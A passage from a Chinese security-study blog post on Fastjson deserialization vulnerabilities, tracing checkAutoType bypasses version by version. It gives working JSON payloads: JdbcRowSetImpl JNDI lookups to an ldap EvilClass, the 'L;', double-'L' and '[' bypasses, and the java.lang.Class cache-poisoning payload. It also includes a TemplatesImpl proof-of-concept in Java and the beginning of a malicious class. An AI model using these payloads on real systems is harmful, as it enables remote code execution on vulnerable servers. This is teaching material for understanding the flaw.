<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Fastjson 反序列化, marin的小窝">
    <meta name="description" content="Fastjson 反序列化FastjsonFastjson 是阿里巴巴开发的一个 json 解析库，主要是对 json 数据进行序列化和反序列化
依赖
&amp;lt;dependency&amp;gt;
    &amp;lt;groupId&amp;gt;com.al">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Fastjson 反序列化 | marin的小窝</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 8.1.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">marin的小窝</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>类型</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于我</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">marin的小窝</div>
        <div class="logo-desc">
            
            一个学习网安的小菜鸡
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			类型
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于我
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/6b5su0brt3bvxzp5za1ixqw5k.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Fastjson 反序列化</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web/">
                                <span class="chip bg-color">web</span>
                            </a>
                        
                            <a href="/tags/java/">
                                <span class="chip bg-color">java</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/WEB/" class="post-category">
                                WEB
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2025-10-05
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="Fastjson-反序列化"><a href="#Fastjson-反序列化" class="headerlink" title="Fastjson 反序列化"></a>Fastjson 反序列化</h1><h2 id="Fastjson"><a href="#Fastjson" class="headerlink" title="Fastjson"></a>Fastjson</h2><p><code>Fastjson</code> 是阿里巴巴开发的一个 json 解析库，主要是对 json 数据进行序列化和反序列化</p>
<p><strong>依赖</strong></p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;dependency&gt;
    &lt;groupId&gt;com.alibaba&lt;&#x2F;groupId&gt;
    &lt;artifactId&gt;fastjson&lt;&#x2F;artifactId&gt;
    &lt;version&gt;1.2.24&lt;&#x2F;version&gt;
&lt;&#x2F;dependency&gt;</code></pre>

<p><code>Fastjson</code> 的主要操作围绕两个核心方法</p>
<ul>
<li><p><code>JSON.toJSONString(Object)</code> 序列化，将 Java 对象转换成 json 文本</p>
</li>
<li><p><code>JSON.parse(String)</code> 反序列化，将 json 文本转换回 java 对象</p>
<ul>
<li><code>JSON.parseObject(String,Class)</code></li>
<li><code>JSON.parseArray(String,Class)</code></li>
</ul>
</li>
</ul>
<p>‍</p>
<h3 id="序列化和反序列化"><a href="#序列化和反序列化" class="headerlink" title="序列化和反序列化"></a>序列化和反序列化</h3><p>先创建一个简单类用来序列化</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import com.alibaba.fastjson.JSON;

public class fastjsondemo1 &#123;
    public static void main(String[] args) &#123;
        Person marin &#x3D; new Person(&quot;marin&quot;, 18);
        String json &#x3D; JSON.toJSONString(marin);
        System.out.println(json);
    &#125;
&#125;</code></pre>

<p>从结果可以看到，这里调用了 <code>getter</code> 方法来获取属性值</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005104300.png" alt="image"></p>
<p>序列化这里可以加多种 <code>SerializerFeature</code>​ 参数，当传入一个 <code>WriteClassName</code>​ ，就可以在序列化结果中打印一个 <code>@type：类名</code></p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">String json &#x3D; JSON.toJSONString(marin, SerializerFeature.WriteClassName);</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005114752.png" alt="image"></p>
<p>下面是利用反序列化方法</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">public class fastjsondemo1 &#123;
    public static void main(String[] args) &#123;
        String json &#x3D; &quot;&#123;\&quot;@type\&quot;:\&quot;com.marin.Fastjson.Person\&quot;,\&quot;age\&quot;:18,\&quot;name\&quot;:\&quot;marin\&quot;&#125;&quot;;
        String json2 &#x3D; &quot;&#123;\&quot;age\&quot;:18,\&quot;name\&quot;:\&quot;marin\&quot;&#125;&quot;;

        System.out.println(JSON.parseObject(json));
        System.out.println(&quot;--------------------------&quot;);
        System.out.println(JSON.parseObject(json2));
        System.out.println(&quot;--------------------------&quot;);
        System.out.println(JSON.parseObject(json,Person.class));
        System.out.println(&quot;--------------------------&quot;);
        System.out.println(JSON.parseObject(json2,Person.class));
        System.out.println(&quot;--------------------------&quot;);
        System.out.println(JSON.parse(json));
        System.out.println(&quot;--------------------------&quot;);
        System.out.println(JSON.parse(json2));
    &#125;
&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005115640.png" alt="image"></p>
<p>我们可以看到这两个方法是反序列化失败了，并且有些方法输出并不是调用 <code>toString</code> 方法的</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">JSON.parseObject(json2)
JSON.parse(json2)</code></pre>

<blockquote>
<ul>
<li><code>parse</code>​ 要反序列化出一个对象，需要带有 <code>@type</code> 指定类</li>
<li><code>parseObject</code>​ 要反序列化出一个对象，需要指定第二个参数为对应的类 <code>Person.class</code>​ ，绕过不指定第二个参数，返回的是一个 <code>JSONObject</code> 对象</li>
</ul>
</blockquote>
<h3 id="特性"><a href="#特性" class="headerlink" title="特性"></a>特性</h3><p>这里的特性是引用素十八师傅的</p>
<ul>
<li><p><code>fastjson</code>​ 在创建一个类实例的时候会通过反射调用类中符合条件的 <code>getter/setter</code> 方法</p>
<p><code>getter</code> 方法条件</p>
<ul>
<li>以 get 开头且第 4 位是大写字母</li>
<li>方法不能有参数传入</li>
<li>不是静态方法</li>
<li>继承自 <code>Collection</code>​、<code>Map</code>​、<code>AtomicBoolean</code>​、<code>AtomicInteger</code>​、<code>AtomicLong</code></li>
<li>这个属性没有 <code>setter</code>​ 方法才会找 <code>getter</code>​ ，<code>setter</code> 是更优先的</li>
</ul>
<p><code>setter</code> 方法条件</p>
<ul>
<li>以 set 开头且第 4 位是大写字母</li>
<li>不是静态方法</li>
<li>返回类型为 void 或 当前类</li>
<li>参数个数为一个</li>
</ul>
</li>
<li><p>如果目标类中私有变量没有 <code>setter</code>​ 但是在反序列化中还是想给这个变量赋值，则需要使用 <code>Feature.SupportNonPublicField</code> 参数</p>
</li>
<li><p><code>fastjson</code>​ 在寻找 <code>getter/setter</code>​ 方法时，调用的函数会忽略 <code>_</code>​ 、<code>-</code>​ ，所以使用的字段名是 <code>n_a_m-e</code>​ ，也会找到 <code>getName</code>​ 方法，在 <code>1.2.36</code> 版本及其后续版本都可以使用</p>
</li>
<li><p>在反序列化时，如果 Field 的类型为 <code>byte[]</code>​ ，将会调用 <code>com.alibaba.fastjson.parser.JSONScanner#bytesValue</code> 进行 base64 解码，在序列化的时候也会进行 base64 编码</p>
</li>
</ul>
<h2 id="fastjson-版本影响"><a href="#fastjson-版本影响" class="headerlink" title="fastjson 版本影响"></a>fastjson 版本影响</h2><h3 id="fastjson-1-2-24"><a href="#fastjson-1-2-24" class="headerlink" title="fastjson 1.2.24"></a>fastjson 1.2.24</h3><p>影响版本：<code>fastjson &lt;= 1.2.24</code></p>
<p>这个就是最基础的版本</p>
<p><code>fastjson</code>​ 可以使用 <code>@type</code>​ 指定反序列化任意类，攻击者可以在 java 常见环境中寻找能够构造恶意类的攻击方法，通过调用 <code>getter/setter</code> 方法来达到传参的目录</p>
<h3 id="fastjson-1-2-25"><a href="#fastjson-1-2-25" class="headerlink" title="fastjson 1.2.25"></a>fastjson 1.2.25</h3><p>影响版本：<code>1.2.25 &lt;= fastjson &lt;= 1.2.42</code></p>
<p><code>fastjson 1.2.25</code>​ 引入了 <code>checkAutoType</code> 安全机制，采用黑白名单机制</p>
<ul>
<li>默认情况下，<code>checkAutoType</code> 关闭，基于白名单实现安全机制</li>
<li>打开 <code>checkAutoType</code> 后，使用的是黑名单来实现安全</li>
</ul>
<p>黑名单包含了</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">bsh
com.mchange
com.sun.
java.lang.Thread,java.net.Socket
java.rmi,javax.xml
org.apache.bcel
org.apache.commons.beanutils
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors
org.apache.commons.collections4.comparators
org.apache.commons.fileupload
org.apache.myfaces.context.servlet
org.apache.tomcat
org.apache.wicket.util
org.codehaus.groovy.runtime
org.hibernate
org.jboss
org.mozilla.javascript
org.python.core
org.springframework</code></pre>

<p>在反序列化中，有一个值 <code>autoTypeSupport</code>​ 这个决定了对 <code>@type</code> 机制的态度，默认为 flase，是不会加载类的<br>只有这个参数为 true 并且通过了白名单的检查就会加载类，如果这个类不在黑白名单中，最后也会加载类</p>
<h4 id="绕过方法"><a href="#绕过方法" class="headerlink" title="绕过方法"></a>绕过方法</h4><p>这里的黑白名单加载类的时候，如果这个类是以 <code>[</code>​ 开头，就会去掉这个字符，然后返回对应的类，或者如果以 <code>L</code>​ 开头和以 <code>;</code> 结尾，就会被去掉头尾再加载，这里就可以绕过黑白名单</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005160949.png" alt="image"></p>
<p>所以像 <a href="#20251005151240-oj1nwel">JdbcRowSetImpl</a> 的 paylaod 就可以改成</p>
<pre class="line-numbers language-json" data-language="json" data-start="1"><code class="language-json">&#123;
	&quot;@type&quot;:&quot;Lcom.sun.rowset.JdbcRowSetImpl;&quot;,
	&quot;dataSourceName&quot;:&quot;ldap:&#x2F;&#x2F;127.0.0.1:8003&#x2F;EvilClass&quot;,
	&quot;autoCommit&quot;:true
&#125;</code></pre>

<p>但是还是需要将 <code>autoTypeSupport</code> 设置为 true，才有加载类的机会</p>
<ul>
<li><p>全局设置</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">ParserConfig.getGlobalInstance().setAutoTypeSupport(true)</code></pre></li>
<li><p>为指定的类设置</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">ParserConfig.getGlobalInstance().addAccept(&quot;com.example.YourClass&quot;)</code></pre></li>
</ul>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005161759.png" alt="image"></p>
<h3 id="fastjson-1-2-42"><a href="#fastjson-1-2-42" class="headerlink" title="fastjson 1.2.42"></a>fastjson 1.2.42</h3><p>影响版本：<code>1.2.25 &lt;= fastjson &lt;= 1.2.42</code></p>
<p>这个版本在黑名单匹配之前，针对以 <code>L</code>​ 开头和 <code>;</code> 结尾的，会先去掉这两个东西之后再匹配黑名单</p>
<h4 id="绕过方法-1"><a href="#绕过方法-1" class="headerlink" title="绕过方法"></a>绕过方法</h4><p>绕过方式就是双写绕过</p>
<pre class="line-numbers language-json" data-language="json" data-start="1"><code class="language-json">&#123;
	&quot;@type&quot;:&quot;LLcom.sun.rowset.JdbcRowSetImpl;;&quot;,
	&quot;dataSourceName&quot;:&quot;ldap:&#x2F;&#x2F;127.0.0.1:8003&#x2F;EvilClass&quot;,
	&quot;autoCommit&quot;:true
&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005161844.png" alt="image"></p>
<h3 id="fastjson-1-2-43"><a href="#fastjson-1-2-43" class="headerlink" title="fastjson 1.2.43"></a>fastjson 1.2.43</h3><p>影响版本：<code>1.2.25 &lt;= fastjson &lt;= 1.2.43</code></p>
<p>这个版本就是把双写ban了，只要开头连续出现了两个 <code>L</code> ，就会报错</p>
<h4 id="绕过方法-2"><a href="#绕过方法-2" class="headerlink" title="绕过方法"></a>绕过方法</h4><p>这里就可以使用之前提到的第一个方法，使用 <code>[</code>​，并且后面需要 <code>[{</code> 来欺骗解析器，使得解析器将后续的内容作为对象的属性来解析</p>
<p><strong>payload</strong></p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">&#123;
	&quot;@type&quot;:&quot;[com.sun.rowset.JdbcRowSetImpl&quot;[&#123;
	&quot;dataSourceName&quot;:&quot;ldap:&#x2F;&#x2F;127.0.0.1:8003&#x2F;EvilClass&quot;,
	&quot;autoCommit&quot;:true
&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005164912.png" alt="image"></p>
<h3 id="fastjson-1-2-44"><a href="#fastjson-1-2-44" class="headerlink" title="fastjson 1.2.44"></a>fastjson 1.2.44</h3><p>影响版本：<code>1.2.25 &lt;= fastjson &lt;= 1.2.44</code></p>
<p>这个版本就把前面的方法都修复了，限制之前所有的绕过方法</p>
<h3 id="fastjson-1-2-45"><a href="#fastjson-1-2-45" class="headerlink" title="fastjson 1.2.45"></a>fastjson 1.2.45</h3><p>影响版本：<code>1.2.25 &lt;= fastjson &lt;= 1.2.45</code></p>
<p>这个版本找到了一个新的可绕过的类 <a href="#20251005151315-1jmydr0">JndiDataSourceFactory</a></p>
<h3 id="fastjson-1-2-47"><a href="#fastjson-1-2-47" class="headerlink" title="fastjson 1.2.47"></a>fastjson 1.2.47</h3><p>影响版本：<code>1.2.25 &lt;= fastjson &lt;= 1.2.32</code>​ 未开启 <code>autoTypeSupport</code>​ 及 <code>1.2.33 &lt;= fastjson &lt;= 1.2.47</code></p>
<p>在 <code>ParserConfig</code>​ 的 <code>checkAutoType</code>​ 方法中有一个机制，其实一直都有，只是在 <code>1.2.47</code> 版本被利用</p>
<p>这个特性就是如果在黑白名单中没有找到匹配的类，会尝试在 <code>TypeUtils</code>​ 的 <code>mappings</code>​ 属性和 <code>deserializers</code> 属性中查找，如果找得到就直接返回</p>
<blockquote>
<p>在 <code>fastjson</code>​ 中，<code>TypeUtils</code> 是一个静态工具类，用来存储很多类型处理、类加载、缓存管理等功能</p>
<p><code>mappings</code>​ 是其中用来存储 类型映射的，将 <code>fastjson</code> 中已知且常用的类名映射到实际的 Class 对象，找到就直接返回加载的 Class 对象</p>
<p><code>deserualizers</code>​ 是存储反序列化器的，针对特定的 java 类定制的，比如 <code>String</code>​、<code>Integer</code> 等，如果已经注册了反序列化器的，那么 Class 对象肯定已经被加载并缓存</p>
</blockquote>
<p>在 <code>autoTypeSupport</code>​ 为 true 的情况下，会进入前面的判断机制，就算这个类在黑名单中，只要 <code>TypeUtils</code>​ 的 <code>mappings</code> 属性中能找到这个类，也不会有异常</p>
<p>如果 <code>autoTypeSupport</code>​ 为 false，那么也能利用，因为 <code>TypeUtils.mappings</code>​ 缓存的检查发生在黑名单检查之后，但在抛出异常之前，并且它的优先级高于 <code>autoTypeSupport</code> 的最终检查</p>
<h4 id="绕过方法-3"><a href="#绕过方法-3" class="headerlink" title="绕过方法"></a>绕过方法</h4><p>将类加载进 <code>TypeUtils.mappings</code>​ 缓存中，能赋值的方法有 <code>addBaseClassMappings</code>​ 和 <code>loadClass(String,ClassLoader,boolean)</code></p>
<p><code>addBaseClassMappings</code>​ 中没有什么操作的空间，在 <code>loadClass</code> 中，我们看到</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251007151707.png" alt="image"></p>
<p>只要传入的对象不为空，就可以将传入的 <code>className</code>​ 加载进 <code>mappings</code> 中</p>
<p>我们找到只有在这个重载用法中才有调用这个方法，并且默认将 <code>boolean</code>​ 设置为 true，另一个方法不能控制 <code>ClassLoader</code> 所以只能找这个</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251007152805.png" alt="image"></p>
<p>在 <code>com.alibaba.fastjson.serializer.MiscCodec#deserialze</code> 方法中，可以找到这个方法的调用</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251007153132.png" alt="image"></p>
<p>可以看到 <code>strVal</code>​ 作为类名，由 <code>objVal</code> 赋值，再往上找</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251007153355.png" alt="image"></p>
<p>如果 <code>parser.resolveStatus</code>​ 是 2 的话，就可以赋值了，<code>parser</code> 是我们可以传入的参数</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251007153519.png" alt="image"></p>
<p>这里赋值用到的 <code>parser.parse()</code>​ 是最后会调用到 <code>JSONScanner#subString(int,int)</code>​ ，用来从 JSON 字符串中取子串，位置已经固定好了，就是取 JSON 字符串的键名为 val 的值，这里的设定是因为 <code>lexer</code>​ 这个 <code>JSONScanner</code> 扫描器对象设定的</p>
<p>这里的详细解析我就没仔细看了（，直接上结论，就是 <code>objVal</code>​ 最后获取到的值就是 <code>val</code> 键对应的值</p>
<ul>
<li>前面我们还提到另一个是 <code>ParserConfig.deserializers</code>​ 的，但是这个就不能由我们操作了，只有这里包含了一个  <code>java.lang.Class</code> 类，所以如果反序列化的是这个类，就可以通过检测</li>
</ul>
<p>然后继续往上走，在 <code>DefaultJSONParser#parseObject(Map,Object)</code>​ 方法中遇到能够通过检测的类就会调用 <code>MiscCodec</code>​ 类来反序列化，并且设置了进入 <code>objVal</code>​ 赋值的条件，就比如刚提到的 <code>java.lang.Class</code></p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">this.setResolveStatus(2);</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251007155344.png" alt="image"></p>
<p>这里最后的 payload 的形式是</p>
<pre class="line-numbers language-json" data-language="json" data-start="1"><code class="language-json">&#123;
	&quot;object1&quot;: &#123;
		&quot;@type&quot;: &quot;java.lang.Class&quot;,
		&quot;val&quot;: &quot;com.sun.rowset.JdbcRowSetImpl&quot;
	&#125;,
	&quot;object2&quot;: &#123;
		&quot;@type&quot;: &quot;com.sun.rowset.JdbcRowSetImpl&quot;,
		&quot;dataSourceName&quot;: &quot;ldap:&#x2F;&#x2F;127.0.0.1:8003&#x2F;EvilClass&quot;,
		&quot;autoCommit&quot;: true
	&#125;	
&#125;</code></pre>

<p>在反序列化第一个类的时候， Class 类可以顺利通过 <code>checkAutoType</code>​ 的检测，并返回 val，后面进入 <code>MiscCodec#deserialze</code>​ 中将 <code>com.sun.rowset.JdbcRowSetImpl</code>​ 加载到 <code>TypeUtils.mappings</code> 中</p>
<p>然后再反序列化第二个类的时候，因为 <code>TypeUtils.mappings</code> 中已经有了，就不会报错，并且能够成功返回</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251008101839.png" alt="image"></p>
<h3 id="fastjson-1-2-48"><a href="#fastjson-1-2-48" class="headerlink" title="fastjson 1.2.48"></a>fastjson 1.2.48</h3><p>这个版本就是修复了污染缓存的漏洞，传参时 <code>boolean</code>​ 默认设置为 false 了，并且将 <code>java.lang.Class</code> 加入黑名单了</p>
<p>‍</p>
<h3 id="fastjson-1-2-68"><a href="#fastjson-1-2-68" class="headerlink" title="fastjson 1.2.68"></a>fastjson 1.2.68</h3><p>影响版本：<code>fastjson &lt;= 1.2.68</code></p>
<p>在这个版本中，添加了一个新的机制，在 <code>ParserConfig#checkAutoType</code>​ 中添加了一个 <code>safeMode</code> ，只要开启了这个，就会直接抛出异常，不能反序列化任何类</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251008102414.png" alt="image"></p>
<h4 id="绕过方法-4"><a href="#绕过方法-4" class="headerlink" title="绕过方法"></a>绕过方法</h4><p>同时，在这个方法中也找到了一个新的绕过方法，这个其实一直都有，只是才找出来，不过也需要关闭 <code>safeMode</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251008102634.png" alt="image"></p>
<p>这里的利用点就是要构造一个符合条件的 <code>expectClass</code>​，就是反序列化的类是传入的 <code>expectClass</code> 的子类</p>
<p><code>expectClass</code>​ 是 <code>ParserConfig#checkAutoType(String,Class&lt;?&gt; ,int)</code> 的第二个参数，查找调用了这个的方法</p>
<p>最后在 <code>ThrowableDeserializer#deserialze</code> 找到一个调用的地方</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251008103440.png" alt="image"></p>
<p>这里会将 <code>@type</code>​ 的值传入第一个参数，<code>Throwable.class</code> 作为第二个值，所以只要我们传入的类是这个的子类，就可以通过检测</p>
<p>‍</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="TemplatesImpl"><a href="#TemplatesImpl" class="headerlink" title="TemplatesImpl"></a>TemplatesImpl</h3><p>影响版本：<code>fastjson &lt;= 1.2.24</code></p>
<p>要利用的类是 <code>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</code></p>
<p>我们可以看到在 <code>getTransletInstance</code>​ 方法中调用了 <code>newInstance</code> 方法，这个可以触发这个类的静态方法，但是这个 get 方法是私有的，无法直接调用</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005143937.png" alt="image">查找用法发现 <code>newTransformer</code> 方法调用了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005144221.png" alt="image"></p>
<p>继续查发现 <code>getOutputProperties</code>​ 调用了这个方法，这个是一个 <code>getter</code>​ 方法，并且返回值 <code>Properties</code> 实现了 Map 接口，符合要求，反序列化时可以调用</p>
<p>不过这个 <code>OutputProperties</code>​ 没有 <code>setter</code>​ 方法，并且是私有的，所以要用 <code>Feature.SupportNonPublicField</code> 赋值</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005144303.png" alt="image"></p>
<p>回到最开始，我们要调用 <code>newInstance</code>​ 方法，得有一个类，这个类是怎么来的，我们可以看到先触发了一个 <code>defineTransletClasses</code>​ 方法，这里使用了一个自定义的类加载器来加载字节码，这个方法里还要求加载的类要继承 <code>AbstractTranslet</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005144912.png" alt="image"></p>
<p><strong>payload</strong></p>
<p>虽然没懂有些参数在这里是干什么用的，但是没有就是会报错（</p>
<pre class="line-numbers language-json" data-language="json" data-start="1"><code class="language-json">&#123;
&quot;@type&quot;:&quot;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&quot;,
&quot;_bytecodes&quot;:base64Code,
&quot;_name&quot;:&quot;marin&quot;,
&quot;_tfactory&quot;:&#123;&#125;,
&quot;_outputProperties&quot;:&#123;&#125;,
&#125;</code></pre>

<h4 id="调用链"><a href="#调用链" class="headerlink" title="调用链"></a>调用链</h4><pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">TemplatesImpl#getOutputProperties()
- TemplatesImpl#newTransformer()
-- TemplatesImpl#getTransletInstance()
--- TemplatesImpl#defineTransletClasses()
---- Class#newInstance()</code></pre>

<h4 id="测试实现"><a href="#测试实现" class="headerlink" title="测试实现"></a>测试实现</h4><p>成功实现</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;

public class Poc &#123;
    public static void main(String[] args) throws IOException &#123;
        byte[] code &#x3D; Files.readAllBytes(Paths.get(&quot;D:\\study\\java\\study\\javacode\\Fastjson\\src\\main\\java\\com\\marin\\Fastjson\\TemplatesImpl\\EvilClass.class&quot;));
        String base64Code &#x3D; Base64.getEncoder().encodeToString(code);
        String poc &#x3D; &quot;&#123;\n&quot; +
                &quot;\&quot;@type\&quot;:\&quot;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\&quot;,\n&quot; +
                &quot;\&quot;_bytecodes\&quot;: [\&quot;&quot; +base64Code +&quot;\&quot;],\n&quot; +
                &quot;\&quot;_name\&quot;:\&quot;marin\&quot;,\n&quot; +
                &quot;\&quot;_tfactory\&quot;:&#123;&#125;,&quot; +
                &quot;\&quot;_outputProperties\&quot;:&#123;&#125;,\n&quot; +
                &quot;&#125;&quot;;
        JSON.parseObject(poc, Object.class, Feature.SupportNonPublicField);
    &#125;
&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005151226.png" alt="image"></p>
<p>恶意的 class 文件</p>
<pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">package com.marin.Fastjson.TemplatesImpl;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
